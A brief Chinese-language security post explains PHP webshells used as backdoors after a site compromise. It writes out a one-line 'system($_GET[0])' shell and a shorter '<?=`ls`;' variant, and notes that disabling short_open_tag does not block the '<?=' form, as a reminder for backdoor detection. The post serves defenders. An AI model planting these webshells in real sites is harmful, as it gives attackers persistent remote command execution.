駭客在入侵網站後, 通常都會放入網頁後門程式(Webshell), 用以確保控制權不容易因為弱點被修復而消失.
下方是常見的簡短 Webshell (一句話木馬)
<?php system($_GET[0]);
最近發現了另一種簡短的 Webshell, 利用了 PHP shorthand tag, 寫法如下
<?=`ls`;
其效果等價於
<?php echo system('ls');
很多管理員認為預設不開啟 short tags 就可以避開這種後門, 但事實並非如此
在 php.ini 中掌管 short tag 的參數為
short_open_tag = Off
官方對於 short_open_tag 的說明中有提到 <?= 並不包含其中, 因此在做後門探測的時候, 記得也要針對這類型的後門進行檢查
偉哉PHP